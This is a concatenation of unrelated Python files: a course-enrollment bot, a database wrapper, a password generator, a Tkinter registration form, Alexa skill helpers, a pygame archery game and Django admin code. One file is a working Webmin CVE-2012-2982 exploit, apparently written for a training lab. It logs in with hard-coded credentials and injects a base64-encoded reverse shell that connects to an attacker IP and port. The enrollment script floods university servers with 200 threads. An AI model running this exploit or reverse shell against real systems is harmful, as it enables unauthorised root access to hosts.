        earlier; self.urls lists the currently usable servers.
        """
        self.concurrent = 200
        self.q = queue.Queue(self.concurrent * 2)
        self.username = username
        self.timeout = TIMEOUT
        self.max = MAX
        self.index1, self.index2 = index1,index2
        self.response = ''
        self.session = requests.session()
        self.session.headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) \
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36'
        # Restore the authenticated session cookie saved by the login step.
        with open('data/cookies/'+ self.username +'.txt','rb') as f:
            cookies = requests.utils.cookiejar_from_dict(pickle.load(f))
        self.session.cookies = cookies
        # Restore the captured __VIEWSTATE values for each page.
        with open('data/values/'+self.username+'view.txt', 'rb') as f:
            view = pickle.load(f)
        self.view = view
        self.urls = [
            'http://202.192.18.189',
            'http://202.192.18.184',
            'http://202.192.18.183',
            'http://202.192.18.182'
        ]*self.max
    def post(self):
        """Worker loop: pull a server URL from the queue and send the
        enrollment POST; record the response on success."""
        self.data = {
            '__EVENTTARGET': '',
            '__EVENTARGUMENT': '',
            '__VIEWSTATE':self.view['state'+self.index1],
            "__VIEWSTATEGENERATOR" : self.view['generator'+self.index1],
            'ddl_kcxz': '',
            'ddl_ywyl': urllib.parse.quote_plus('有'.encode('gb2312')),
            'ddl_kcgs': '',
            'ddl_xqbs': '1',
            'ddl_sksj': '',
            'TextBox1': '',
            'kcmcGrid:_ctl'+self.index2+':xk':'on',
            'Button1': urllib.parse.quote_plus(' 提交 '.encode('gb2312')),
            'dpkcmcGrid:txtChoosePage': self.index1,
            'dpkcmcGrid:txtPageSize': '100',
            'dpDataGrid2:txtChoosePage':'1',
            'dpDataGrid2:txtPageSize':'100'
        }
        while True:
            try:
                url = self.q.get()
                response = self.session.post(url,data = self.data,timeout = self.timeout)
                if response.status_code == 200:
                    self.response = response
                    # Fix: get_selected_course is a module-level function, not
                    # a method; the original `self.get_selected_course(...)`
                    # raised AttributeError which the bare except silently
                    # swallowed, so self.selected was never populated.
                    self.selected = get_selected_course(response)
                self.q.task_done()
            except Exception:
                # Timeouts/connection errors are expected during the rush;
                # mark the task done and move on.
                self.q.task_done()
    def run(self):
        """Start the worker threads and queue one request per server URL."""
        for i in range(self.concurrent):
            t = Thread(target=self.post)
            t.daemon = True
            t.start()
        try:
            for host in self.urls:
                url = host+'/xf_xsqxxxk.aspx?xh='+self.username+'&xm='+self.view['urlname']+'&gnmkdm=N121203'
                self.q.put(url.strip())
            self.q.join()
        except KeyboardInterrupt:
            sys.exit(1)
    def show_selected(self):
        """Print and return the list of currently enrolled courses, falling
        back to a fresh page fetch when the cached response is unusable."""
        try:
            courses = get_selected_course(self.response)
            print('已选课程:{}'.format(courses))
            return courses
        except Exception:
            self.session.get('http://202.192.18.184')
            url="http://202.192.18.184/xf_xsqxxxk.aspx?xh="+self.username
            response = self.session.get(url)
            courses = get_selected_course(response)
            print('已选课程:{}'.format(courses))
            return courses
|
"""
*
* Author: Juarez Paulino(coderemite)
* Email: juarez.paulino@gmail.com
*
"""
# Read d, n and n integers; print sum(d - x_i) over all but the last value.
d = int(input())
n = int(input())
values = list(map(int, input().split()))
total = sum(d - v for v in values)
# Drop the final element's contribution, exactly as the original r - d + x.
print(total - d + values[-1])
|
# -*- coding:utf-8 -*-
# import pymysql as ps
# import pymssql as ps
import contextlib
import pandas as pd
from Common.Config.DBConfig import DBConfig
from Common.DB.EnumType import *
from Common.DB.DBCommon import DBCommon
# Choose the DB driver at import time from configuration; both pymysql and
# pymssql are bound to the same alias `ps` so the rest of the module is
# driver-agnostic.
dbType =DBConfig.getDBType()
if dbType == DBType.MYSQL:
    import pymysql as ps
elif dbType == DBType.SQLSERVER:
    import pymssql as ps
else:
    # NOTE(review): no-op branch -- for any other dbType the name `ps` is
    # never bound and later references will raise NameError. Confirm intent.
    None
class DataAccess:
    """Thin data-access layer over pymysql/pymssql (both aliased as `ps`).

    Connection settings default to the values in DBConfig; the connection
    and cursors are created lazily and closed by close()/__del__. Query
    helpers return {'effect_row', 'rows' (DataFrame), 'heads'} dicts.
    """
    def __init__(self,config=True):
        # When config is True, pull connection settings from DBConfig.
        if config:
            self.host=DBConfig.getDBHOST()
            self.port = DBConfig.getDBPORT()
            self.user=DBConfig.getDBUSER()
            self.passwd=DBConfig.getDBPASSWORD()
            self.database=DBConfig.getDBName()
            self.charset=DBConfig.getDBCHARSET()
        self.__conn=None
        self.__cursor=None
        self.__dictCursor=None
    def __del__(self):
        # Best-effort cleanup when the instance is garbage collected.
        self.close()
    def close(self):
        """Close any open cursors and the connection."""
        if self.__cursor:
            self.__cursor.close()
        if self.__dictCursor:
            self.__dictCursor.close()
        if self.__conn:
            self.__conn.close()
    @property
    def Conn(self):
        # Lazily opened connection built from the configured settings.
        if self.__conn == None:
            self.__conn = self.connect2()
        return self.__conn
    @property
    def Cursor(self):
        # Lazily created default cursor.
        if self.__cursor == None:
            self.__cursor = self.Conn.cursor()
        return self.__cursor
    @Cursor.setter
    def Cursor(self, value):
        self.__cursor = value
    @property
    def DictCursor(self):
        # Cursor returning rows as dicts.
        # NOTE(review): ps.cursors.DictCursor exists for pymysql only; this
        # property fails under pymssql -- confirm it is MySQL-only by design.
        if self.__dictCursor == None:
            self.__dictCursor = self.Conn.cursor(cursor=ps.cursors.DictCursor)
        return self.__dictCursor
    def connect(self,host='localhost',port=3306,user='root',passwd='',database='test',charset='utf8'):
        """Open and return a raw driver connection for the configured dbType.

        Raises RuntimeError when the driver fails to connect (or when the
        dbType is unsupported).
        """
        try:
            if dbType == DBType.MYSQL:
                conn = ps.connect(host=host, user=user, passwd=passwd, db=database, port=port, charset=charset)
            elif dbType == DBType.SQLSERVER:
                conn = ps.connect(server=host, user=user, password=passwd, database=database, port=port, charset=charset)
            else:
                # Unsupported dbType: `conn` stays unbound; the NameError on
                # the next line is converted to RuntimeError below.
                None
            return conn
        except Exception:
            # Fix: the original executed `raise("...")`, i.e. tried to raise
            # a plain string, which is itself a TypeError in Python 3
            # ("exceptions must derive from BaseException").
            raise RuntimeError("DataBase connect error,please check the db config.")
    def connect2(self,**kwargs):
        """Connect using instance settings, or explicit kwargs
        (host/port/user/password/charset/database) when supplied."""
        if kwargs=={}:
            conn=self.connect(self.host,self.port,self.user,self.passwd,self.database,self.charset)
        else:
            # Fix: connect() takes `passwd`, not `password`; the original call
            # raised TypeError whenever kwargs were supplied.
            conn=self.connect(host=kwargs["host"], port=kwargs["port"], user=kwargs["user"],
                              passwd=kwargs["password"], charset=kwargs["charset"], database=kwargs["database"])
        return conn
    def __Execute(self,cmdText, params=None,rowType=RowType.Many,commit=True,cursor=None):
        """Execute *cmdText* (a SQL statement) with optional *params*.

        Returns {'effect_row': affected-row count, 'rows': DataFrame of the
        fetched rows, 'heads': column names}; returns None (after printing
        the error) when the driver raises ps.Error.
        """
        columnHeads = []
        try:
            if not cursor:
                cursor=self.Cursor
            if params is None:
                effect_row =cursor.execute(cmdText)
            else:
                effect_row = cursor.execute(cmdText,params)
            columns = cursor.description
            if rowType== RowType.Many:
                rows = cursor.fetchall()
            else:
                rows = cursor.fetchone()
            dfrows= pd.DataFrame(list(rows))
            for column in columns:
                columnHeads.append(column[0])
            if not dfrows.empty:
                dfrows.columns=columnHeads
            effect_row=cursor.rowcount
            return { 'effect_row':effect_row,'rows': dfrows,'heads':columnHeads}
        except ps.Error as e:
            print(e)
        finally:
            if commit:
                self.Conn.commit()
    def ExecuteNonQuery(self,cmdText,params=None,commit=True):
        """Execute a statement and return the full result dict."""
        return self.__Execute(cmdText,params,RowType.Many,commit)
    def ExecuteScalar(self,cmdText,params=None,commit=True):
        """Execute a statement fetching only the first row of the result."""
        return self.__Execute(cmdText,params, RowType.One, commit)
    def ExecuteMany(self, cmdText,params=None, commit=True):
        """executemany() wrapper; returns {'effect_row': n, 'lastid': id}."""
        try:
            effect_row = self.Cursor.executemany(cmdText, params)
            lastid =self.Cursor.lastrowid
            return {'effect_row': effect_row, 'lastid': lastid}
        finally:
            if commit:
                self.Conn.commit()
    # Context manager: yields a cursor and commits/closes on exit, closing
    # the connection too when it was opened here.
    @contextlib.contextmanager
    def mysql(self,conn=None):
        close =False
        if not conn:
            close=True
            conn=self.connect2()
        # NOTE(review): pymysql-specific type check; under pymssql this test
        # is False and `cursor` below is unbound (NameError) -- confirm.
        if type(conn)==ps.connections.Connection:
            cursor = conn.cursor()
        try:
            yield cursor
        finally:
            conn.commit()
            cursor.close()
            if close:
                conn.close()
    def ExecuteNonQueryByConn(self,cmdText,params=None,conn=None):
        """Like ExecuteNonQuery, but on an explicit (or fresh) connection."""
        with self.mysql(conn) as cursor:
            return self.__Execute(cmdText,params,RowType.Many,False,cursor)
    def ExecuteScalarByConn(self,cmdText,params=None,conn=None):
        """Like ExecuteScalar, but on an explicit (or fresh) connection."""
        with self.mysql(conn) as cursor:
            return self.__Execute(cmdText,params, RowType.One,False, cursor)
    def ExecuteManyByConn(self, cmdText,params=None,conn=None):
        """Like ExecuteMany, but on an explicit (or fresh) connection."""
        with self.mysql(conn) as cursor:
            try:
                effect_row = cursor.executemany(cmdText, params)
                lastid = cursor.lastrowid
                return {'effect_row': effect_row, 'lastid': lastid}
            except ps.Error as e:
                print(e)
            finally:
                pass
    def ExecuteStoredProcdure(self, cmdText, params=None,conn=None):
        """Call stored procedure *cmdText*; returns (result rows, params
        re-fetched after the call), or None on driver error."""
        with self.mysql(conn) as cursor:
            try:
                if not params:
                    cursor.callproc(cmdText)
                    rs=cursor.fetchall()
                else:
                    # Renamed from `str` -- the original shadowed the builtin.
                    call_sql = DBCommon.getArgs(cmdText, params)
                    cursor.callproc(cmdText, args=params)
                    rs = cursor.fetchall()
                    cursor.execute(call_sql)
                    cursor.execute("select 1")
                    params = cursor.fetchall()
                return (rs,params)
            except ps.Error as e:
                print(e)
            finally:
                pass
|
"""Add widgets onto URI contexts."""
from django.conf import settings
import www.common.context
from .models import WikiPage, WikiHome
from .page import OneColumnPage
def home_widget_context(context):
    """Attach the home wiki (and, when the home page is enabled, the home
    page itself) to context['widgets']; no-op when 'id' is absent."""
    if 'id' not in context:
        return
    widgets = context.setdefault('widgets', {})
    guid = context['id']
    if settings.WIDGETS_ENABLE_HOME_PAGE:
        wiki_page = WikiPage.objects.get_or_create_wikipage(guid, 'Home')
        widgets['wiki'] = wiki_page.wiki
        widgets['home'] = wiki_page.page
    else:
        widgets['wiki'], _ = WikiHome.objects.get_or_create(slug=guid)
# Register the context processor only when widgets are globally enabled.
if settings.WIDGETS_ENABLED:
    www.common.context.pre_processors.add(home_widget_context)
|
"""Generate a 15-character password and append the credential entry to
allpsswrds.txt."""
import random  # retained for compatibility; generation now uses `secrets`
import secrets
import string

email = input("What email did you use?")
uname = input("What username did you use?")
account = input("What is this for?")
# Same character set as before: a-zA-Z0-9 plus !@#$%^&*().
list_of_char = list(string.ascii_letters + string.digits + "!@#$%^&*()")
# Fix: random.sample() is predictable and unsuitable for passwords; use the
# OS CSPRNG via secrets.SystemRandom (still 15 distinct characters).
ugly_pass = secrets.SystemRandom().sample(list_of_char, 15)
real_pass = ''.join(ugly_pass)
keys = "email: "+str(email)+" | uname: "+str(uname)+" | account: "+str(account)+" | password: "+str(real_pass)
print("Here is the key for " + account)
print(keys)
# Fix: the original opened the file at script start and relied on a manual
# close(); a context manager guarantees the handle is released.
with open('allpsswrds.txt', 'a') as out_file:
    out_file.write('\n')
    out_file.write(keys)
|
from tkinter import *
from PIL import Image,ImageTk
from tkinter import messagebox
import sqlite3
class Register:
    """Patient registration window.

    Builds a Tkinter form over a background image, validates the entries on
    submit, and inserts the patient into the 'patients' table of
    patients_book.db.
    """
    def __init__(self, master):
        self.root = master
        self.root.title("Registeration")
        self.root.geometry("720x620+20+20")
        self.root.resizable(False, False)
        self.bottom = Frame(self.root, height=500, bg='lightblue')
        self.bottom.pack(fill=X)
        # Background image stretched to cover the frame.
        self.raw_image = Image.open('icons/bckgrnd.png')
        self.raw_image = self.raw_image.resize((1600, 900))
        self.img = ImageTk.PhotoImage(self.raw_image)
        self.panel = Label(self.bottom, image=self.img)
        self.panel.pack()
        self.panel.grid_propagate(0)
        self.register_icon = PhotoImage(file='icons/patient.png')
        self.icon_label = Label(self.panel, bg='#ebe6d8', image=self.register_icon)
        self.icon_label.place(x=200, y=30)
        self.top_label = Message(self.panel, width=600, font=("Monotype Corsiva", 20, "bold italic"), text="Registeration", bg="#ebe6d8", relief=SOLID, borderwidth=2)
        self.top_label.place(x=290, y=40)
        # Gender radio group; defaults to 'Others'.
        self.Gender = StringVar(value='@')
        self.Gender.set(value='Others')
        self.bottom.grid_propagate(0)
        self.home_icon = PhotoImage(file='icons/home-run.png')
        # Field labels.
        self.l_fname = Label(self.bottom, text='First Name', font=('arial'))
        self.l_lname = Label(self.bottom, text='Last Name', bg='#ebe6d8', font=('arial'))
        self.l_dob = Label(self.bottom, text='Date Of Birth', bg='#ebe6d8', font=('arial'))
        self.l_yr = Label(self.bottom, text='(YYYY-MM-DD)', bg='#ebe6d8', font=('arial 10 bold'))
        self.l_address = Label(self.bottom, text='Address:', bg='#ebe6d8', font=('arial'))
        self.l_gender = Label(self.bottom, text='Gender:', bg='#ebe6d8', font=('arial'))
        self.l_bgroop = Label(self.bottom, text='BLood Group', bg='#ebe6d8', font=('arial'))
        self.l_phone = Label(self.bottom, text='Contact No.', bg='#ebe6d8', font=('arial'))
        self.l_email = Label(self.bottom, text='Email Address', bg='#ebe6d8', font=('arial'))
        # Entry widgets.
        self.firstname = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
        self.lastname = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
        self.dob = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
        self.address = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
        self.bgroop = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
        self.phone = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
        self.email = Entry(self.bottom, width=30, bg='white', fg='black', font=('arial'))
        # NOTE(review): this attribute rebinds the name `submit`, shadowing
        # the submit() method on the instance; the Button captured the bound
        # method first so the callback still works, but renaming one of the
        # two would be safer.
        self.submit = Button(self.bottom, text='Submit', command=self.submit, bg='#ebe6d8', padx=20, font=('arial'))
        self.home_button = Button(self.bottom, image=self.home_icon, command=self.Homepage, bg='#ebe6d8', padx=20,
                                  font=('arial'))
        self.r1 = Radiobutton(self.bottom, variable=self.Gender, value='Male', bg='white', text='Male',
                              font=('arial'))
        self.r2 = Radiobutton(self.bottom, variable=self.Gender, value='Female', bg='white', text='Female',
                              font=('arial'))
        self.r3 = Radiobutton(self.bottom, variable=self.Gender, value='Others', bg='white', text='Others',
                              font=('arial'))
        # Static placement of all widgets.
        self.l_lname.place(x=40, y=200)
        self.l_fname.place(x=40, y=160)
        self.l_dob.place(x=40, y=240)
        self.l_yr.place(x=40, y=270)
        self.l_address.place(x=40, y=300)
        self.l_gender.place(x=40, y=340)
        self.l_bgroop.place(x=40, y=380)
        self.l_phone.place(x=40, y=420)
        self.l_email.place(x=40, y=460)
        self.firstname.place(x=200, y=160)
        self.lastname.place(x=200, y=200)
        self.dob.place(x=200, y=240)
        self.address.place(x=200, y=300)
        self.r1.place(x=200, y=340)
        self.r2.place(x=320, y=340)
        self.r3.place(x=440, y=340)
        self.bgroop.place(x=200, y=380)
        self.phone.place(x=200, y=420)
        self.email.place(x=200, y=460)
        self.home_button.place(x=670, y=30)
        self.submit.place(x=475, y=525)
        self.footer = Label(self.panel, bg="ivory3", height=1, text="@Copyright 2020 Alokanand. All rights reserved")
        self.footer.pack(side=BOTTOM, fill=X)
        self.panel.pack_propagate(0)
        mainloop()
    def submit(self):
        """Validate the form and insert the patient record on success."""
        self.val1 = self.firstname.get()
        self.val2 = self.lastname.get()
        self.val3 = self.dob.get()
        self.val4 = self.address.get()
        self.val5 = self.bgroop.get()
        self.val6 = self.phone.get()
        self.val7 = self.email.get()
        self.val8 = self.Gender.get()
        required = (self.val1, self.val2, self.val3, self.val4,
                    self.val5, self.val6, self.val7)
        # Fix: the original compared most fields to a single space (' ')
        # rather than the empty string, so genuinely empty entries slipped
        # through the "fill all entries" check.
        if any(not value.strip() for value in required):
            messagebox.showinfo('Warning!', 'Please fill all entries !!!')
        elif len(self.val6) != 10:
            messagebox.showinfo('Mobile No. has 10 digits !', 'Please fill proper Mobile No. !!!')
        elif '@' not in self.val7 or '.com' not in self.val7 or '@.com' in self.val7 or ' ' in self.val7:
            messagebox.showinfo('Suggestion !!', 'Please fill proper E-mail ID !!!')
        else:
            # Open the DB only when there is something to insert, and always
            # close it (the original leaked the handle on validation errors).
            conn = sqlite3.connect('patients_book.db')
            try:
                sql = "INSERT INTO 'patients' (first_name ,last_name ,address ,email ,DOB,Gender,Blood_group,mobile_no) VALUES (?,?,?,?,?,?,?,?) "
                conn.execute(sql, (self.val1, self.val2, self.val4, self.val7, self.val3, self.val8, self.val5, self.val6))
                conn.commit()
            finally:
                conn.close()
            messagebox.showinfo('Success!', 'Your Data is Registered')
            # Reset the form for the next patient.
            for entry in (self.firstname, self.lastname, self.dob, self.address,
                          self.bgroop, self.phone, self.email):
                entry.delete(0, END)
    def Homepage(self):
        """Tear down this form and navigate back to the home page."""
        self.bottom.destroy()
        self.panel.destroy()
        import register  # local import: avoids a circular import at module load
        register.ViewPage(self.root)
# app=Register()
# app.mainloop()
# Launch the registration window standalone.
if __name__ == "__main__":
    root = Tk()
    Register(root)
    root.mainloop()
|
import utils
import speech
LARGE_NUMBER_DAYS = 3650
def ensure_date_and_service_slots_filled(intent):
    """Return a Dialog.Delegate response while the Date or Service slot is
    still unfilled; return None once both carry a value."""
    slots = intent["slots"]
    if "value" in slots["Date"] and "value" in slots["Service"]:
        return None
    delegate = {
        "shouldEndSession": False,
        "directives": [{"type": "Dialog.Delegate"}]
    }
    return utils.build_response(delegate)
def ensure_date_is_a_sunday(intent, future_days_go_back_year_threshold=LARGE_NUMBER_DAYS):
    """Resolve the Date slot to a Sunday.

    Returns (date, None) on success, or (None, response) where the response
    re-elicits the Date slot using the error text.
    """
    try:
        date = utils.sunday_from(intent["slots"]["Date"]["value"],
                                 future_days_go_back_year_threshold)
    except RuntimeError as e:
        # Fix: Python 3 exceptions have no `.message` attribute, so the
        # original `e.message` raised AttributeError here instead of
        # re-prompting the user; str(e) yields the same text safely.
        speech_output = str(e)
        get_date_directives = [{"type": "Dialog.ElicitSlot", "slotToElicit": "Date"}]
        speechlet_response = utils.build_speechlet_response(output=speech_output,
                                                           reprompt_text=None,
                                                           should_end_session=False,
                                                           directives=get_date_directives)
        return None, utils.build_response(speechlet_response)
    return date, None
def ensure_service_valid(intent):
    """Extract the resolved service id (lower-cased) from the Service slot.

    Returns (service, None) on success, or (None, response) asking the user
    to repeat the service when the slot resolution is missing.
    """
    slot = intent["slots"]["Service"]
    try:
        resolved = slot["resolutions"]["resolutionsPerAuthority"][0]["values"][0]
        service = resolved["value"]["id"].lower()
    except KeyError:
        directives = [{"type": "Dialog.ElicitSlot", "slotToElicit": "Service"}]
        speechlet_response = utils.build_speechlet_response(output=speech.PLEASE_REPEAT_SERVICE,
                                                           reprompt_text=None,
                                                           should_end_session=False,
                                                           directives=directives)
        return None, utils.build_response(speechlet_response)
    return service, None
def ensure_date_is_not_in_the_future(date):
    """Return an end-session response when *date* lies in the future;
    return None when the date is acceptable."""
    if utils.is_not_in_future(date):
        return None
    speechlet_response = utils.build_speechlet_response(output=speech.SERVICE_IS_IN_THE_FUTURE,
                                                       reprompt_text=None,
                                                       should_end_session=True)
    return utils.build_response(speechlet_response)
|
#!/usr/bin/env python
#CVE-2012-2982 translated from ruby metasploit module (/webmin_show_cgi_exec.rb)
#program outline:
# - POST request with compromised creds to get the cookie
# - exploit using invalid characters to get system shell
# - fetches system shell as root
# - sends shell through socket to listening attacker IP
#usage:
# - MUST BE SSH TUNNELED INTO MACHINE TO ACCESS localhost
# - python gamezone.py
# - listen with nc -nlvp 4445 on attacker
import sys, os, subprocess, requests, socket, string, secrets, base64
lhost = "10.10.174.47" #attacker IP CHANGE, needs to be a string to convert in payload function
lport = "4445" # listening port, string to convert in payload function
#Login with compromised creds and print good status response
creds = {'page' : "%2F", 'user' : "agent47", 'pass' : "videogamer124"} #must be A dictionary, list of tuples, bytes or a file object
url = "http://localhost:10000/session_login.cgi"
r = requests.post(url, data=creds, cookies={"testing":"1"}, verify=False, allow_redirects=False) #send POST request to login
#if status code 302 found and sid not empty
# NOTE(review): when login fails, r.cookies["sid"] raises KeyError before the
# else branch can print, and the script continues to the sid parse below
# regardless of the outcome -- confirm whether a hard exit was intended here.
if r.status_code == 302 and r.cookies["sid"] != None:
    print("[+] Login successful, executing payload (listen for shell)")
else:
    print("[-] Failed to login")
sid = r.headers['Set-Cookie'].replace('\n', '').split('=')[1].split(";")[0].strip() #replace the sid cookie newline character, split at = and store the second element (sid) of array, split at ; and stop at first element in array, strip remaining
#generates random characters and delivers the payload
def rand():
    """Return a 5-character random alphanumeric string."""
    alphaNum = string.ascii_letters + string.digits #custom alphanumeric string variable
    randChar = ''.join(secrets.choice(alphaNum) for i in range(5)) #generate 5 random alphanumeric characters
    return randChar
def payload():
    """Build the command string using the module-level lhost/lport values."""
    payload = "python -c \"import base64;exec(base64.b64decode('" #run python command to execute base64
    shell = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\""+ lhost + "\"," + lport + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])" #open a socket, send it to the attacking host/port, open the shell
    shell = str.encode(shell) #encode the shellcode as a string
    encoded = base64.b64encode(shell) #encode the string with base64
    encoded = encoded.decode("utf-8") #decode that to be used as a string in the exploit URL
    closing = "'))\"" #close the payload
    payload += encoded #update the payload to contain the encoded/decoded parameters
    payload += closing
    return payload
# Build and send the show.cgi request carrying the session cookie.
exp = "http://localhost:10000/file/show.cgi/bin/" + "%s|%s|" % (rand(), payload())
req = requests.post(exp, cookies={"sid":sid}, verify=False, allow_redirects=False) #send POST request to upload shellcode
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from django.http import Http404
from django.template import loader
from .models import File
from django.views.generic.edit import CreateView
from django.views import generic
# Create your views here.
def index(request):
    """List every uploaded File on the uploadfile index template."""
    context = {
        'all_files': File.objects.all(),
    }
    return render(request, 'uploadfile/index.html', context)
class FileFormCreate(CreateView):
    # Generic create view for File; renders the default ModelForm for the
    # listed fields (template name and success URL follow CreateView
    # conventions).
    model = File
    fields = ['name','company','file_type','file_url', 'file_title'] |
import pygame
from pygame import mixer
import screeninfo
from screeninfo import get_monitors
pygame.init()
mixer.init()
# Basic palette.
white = (255, 255, 255)
black = (0, 0, 0)
red = (255, 0, 0)
# Take the dimensions of the last monitor the loop visits.
for m in get_monitors():
    screen_width = m.width
    screen_height = m.height
# Target block and arrow dimensions (pixels).
block_width = 8
block_height = 130
arrow_width = 95
arrow_height = 5
display = pygame.display.set_mode((screen_width, screen_height),pygame.FULLSCREEN)
BG=pygame.image.load("background.png")
BG=pygame.transform.scale(BG,(screen_width, screen_height))
ar_img=pygame.image.load("bow.png")
ar_img=pygame.transform.scale(ar_img,(100, 100))
ar_img=pygame.transform.rotate(ar_img,-90)
ar_small=pygame.image.load("bow.png")
# NOTE(review): this scales ar_img (the already-rotated big sprite), not the
# freshly loaded ar_small -- confirm whether scaling ar_small was intended.
ar_small=pygame.transform.scale(ar_img,(40, 40))
ar_small=pygame.transform.rotate(ar_small,90)
# mixer.music.load() returns None; the music is started later via play().
BG_MUSIC=mixer.music.load("BG.mp3")
hit=pygame.mixer.Sound("hit.wav")
pygame.display.set_caption("ARCHERY MASTER 5000")
clock = pygame.time.Clock()
font = pygame.font.SysFont(None, 40)
def message_to_screen(msg, color, place):
    """Render *msg* with the module font in *color* and blit it at *place*."""
    rendered = font.render(msg, True, color)
    display.blit(rendered, place)
def gameLoop():
    """Main game loop: a bobbing three-layer target on the right, an arrow
    fired from the left with SPACE; 10 arrows per game, Q quits."""
    BG_MUSIC = mixer.music.play(-1)  # loop background music forever
    block_x = screen_width-30
    block_y = 25
    block_speed = 13
    arrow_x = 1
    arrow_y = screen_height//2
    arrow_speed = 0
    count=10   # arrows remaining
    score=0
    gameExit = False
    while not gameExit:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                gameExit = True
            if event.type == pygame.KEYDOWN:
                # Only fire when the arrow is parked at its start position.
                if event.key == pygame.K_SPACE and arrow_x==1:
                    count-=1
                    arrow_speed = 28
                if event.key == pygame.K_q:
                    gameExit = True
        display.blit(BG,(0,0))
        display.blit(ar_img,(arrow_x, arrow_y))
        # Arrow flew off-screen: reset it.
        if arrow_x> screen_width+300:
            arrow_x=1
            arrow_speed = 0
        # Hit tests against the three target layers (inner=30, mid=20, outer=10).
        # NOTE(review): rect3/rect2 are assigned near the end of the loop body,
        # so these reads rely on the collision being impossible on the very
        # first frame (arrow starts far left) -- confirm.
        if (arrow_x+ar_img.get_width())in range(block_x-(3*block_width),block_x-(2*block_width)+4)and ((arrow_y) in range(rect3.top,rect3.bottom)):
            pygame.mixer.Sound.play(hit)
            arrow_x = 1
            arrow_speed = 0
            score+=30
        elif (arrow_x+ar_img.get_width())in range(block_x-(2*block_width),block_x-block_width+4) and (arrow_y) in range(rect2.top,rect2.bottom):
            pygame.mixer.Sound.play(hit)
            arrow_x = 1
            arrow_speed=0
            score+=20
        elif (arrow_x+ar_img.get_width())in range(block_x-block_width,block_x+4) and (arrow_y) in range(block_y,block_y+block_height+2):
            pygame.mixer.Sound.play(hit)
            arrow_x = 1
            arrow_speed=0
            score+=10
        # Bounce the target off the top/bottom edges.
        if block_y < 5 or block_y > screen_height - block_height + 5:
            block_speed *= -1
        block_y += block_speed
        arrow_x+= arrow_speed
        # position set - > debug
        # Out of arrows (count goes 10 -> -1 after the 11th press? see NOTE):
        # NOTE(review): the game ends only when count reaches -1, i.e. after
        # 11 shots rather than 10 -- confirm the intended arrow budget.
        if count==-1 :
            gameExit=True
        message_to_screen("score:" +str(score), white,(30,30))
        message_to_screen(str(count), white,(screen_width-150,30))
        display.blit(ar_small,(screen_width-120,27))
        message_to_screen("press q for exit", white,(30,screen_height-40))
        message_to_screen("press space for fire", white,(screen_width-300,screen_height-40))
        rect1=pygame.draw.rect(display, (255, 0, 0), [block_x, block_y, block_width, block_height])
        rect2=pygame.draw.rect(display, (100, 10, 5), [block_x-block_width, block_y+30, block_width,
                                                       block_height-60])
        rect3=pygame.draw.rect(display, (black), [block_x-(2*block_width), block_y+45, block_width, block_height-90])
        display.blit(ar_img, (arrow_x, arrow_y))
        pygame.display.update()
        clock.tick(80)
    pygame.quit()
    quit()
gameLoop()
|
from gpiozero import MotionSensor

# PIR sensor wired to GPIO pin 17.
pir = MotionSensor(17)
# wait_for_motion(timeout) blocks until motion fires or the 4 s timeout
# elapses, returning a truthy value only when motion was seen.
motion_seen = pir.wait_for_motion(4)
print("Motion detected!" if motion_seen else "no motion")
|
from deeds.jobs import import_data_async
from deeds.models import (
Data, Deed, DeedType, Gender, Origin, OriginType, Party, Person, Profession,
Role, Source
)
from django.contrib import admin, messages
from django_rq import job
from rq import get_current_job
class BaseALAdmin(admin.ModelAdmin):
    """Shared admin base for simple models listed and searched by 'title'."""
    list_display = ['title']
    search_fields = ['title']
@admin.register(Data)
class DataAdmin(admin.ModelAdmin):
    """Admin for Data uploads; saving a record enqueues the async import."""
    autocomplete_fields = ['deed_type', 'place']
    list_display = ['title', 'deed_type', 'data']
    list_filter = ['deed_type']
    def save_model(self, request, obj, form, change):
        """Persist the object, then kick off the background import job."""
        super().save_model(request, obj, form, change)
        import_data_async.delay(request.user, obj)
class PartyInline(admin.TabularInline):
    """Tabular inline for Party rows (shared by Deed and Person admins)."""
    model = Party
    autocomplete_fields = ['deed', 'person', 'profession', 'role']
    extra = 1
@admin.register(Deed)
class DeedAdmin(admin.ModelAdmin):
    """Admin for Deed records with inline party editing."""
    autocomplete_fields = ['deed_type', 'place', 'source']
    date_hierarchy = 'date'
    inlines = [PartyInline]
    list_display = ['n', 'date', 'deed_type', 'place', 'source']
    list_filter = ['deed_type', 'place']
    # NOTE(review): 'deed_type', 'place' and 'source' are relations — Django
    # admin search needs a related lookup (e.g. 'deed_type__title') and will
    # raise on a bare FK name when a search is performed; confirm and adjust.
    search_fields = ['n', 'date', 'deed_type', 'place', 'source']
@admin.register(DeedType)
class DeedTypeAdmin(BaseALAdmin):
    """Admin for DeedType; title list/search inherited from BaseALAdmin."""
    pass
@admin.register(Gender)
class GenderAdmin(BaseALAdmin):
    """Admin for Gender; title list/search inherited from BaseALAdmin."""
    pass
@admin.register(OriginType)
class OriginTypeAdmin(BaseALAdmin):
    """Admin for OriginType; title list/search inherited from BaseALAdmin.

    BUG FIX: this class used to be named ``OriginType``, shadowing the
    imported model of the same name for the rest of the module. The decorator
    argument is evaluated before the class binding, so registration of the
    model is unchanged; the class now follows the module's ``*Admin`` naming
    convention.
    """
    pass
class OriginInline(admin.TabularInline):
    """Tabular inline for Origin rows (used by the Person admin)."""
    model = Origin
    autocomplete_fields = ['origin_type', 'place']
    extra = 1
@admin.register(Person)
class PersonAdmin(admin.ModelAdmin):
    """Admin for Person with inline origins and party memberships."""
    inlines = [OriginInline, PartyInline]
    # 'get_origins' is presumably a display method on the Person model or on
    # this admin — verify it exists.
    list_display = ['name', 'surname', 'gender',
                    'age', 'birth_year', 'get_origins']
    list_display_links = list_display  # every column links to the change page
    list_filter = ['gender', 'age', 'surname']
    search_fields = ['name', 'surname']
@admin.register(Origin)
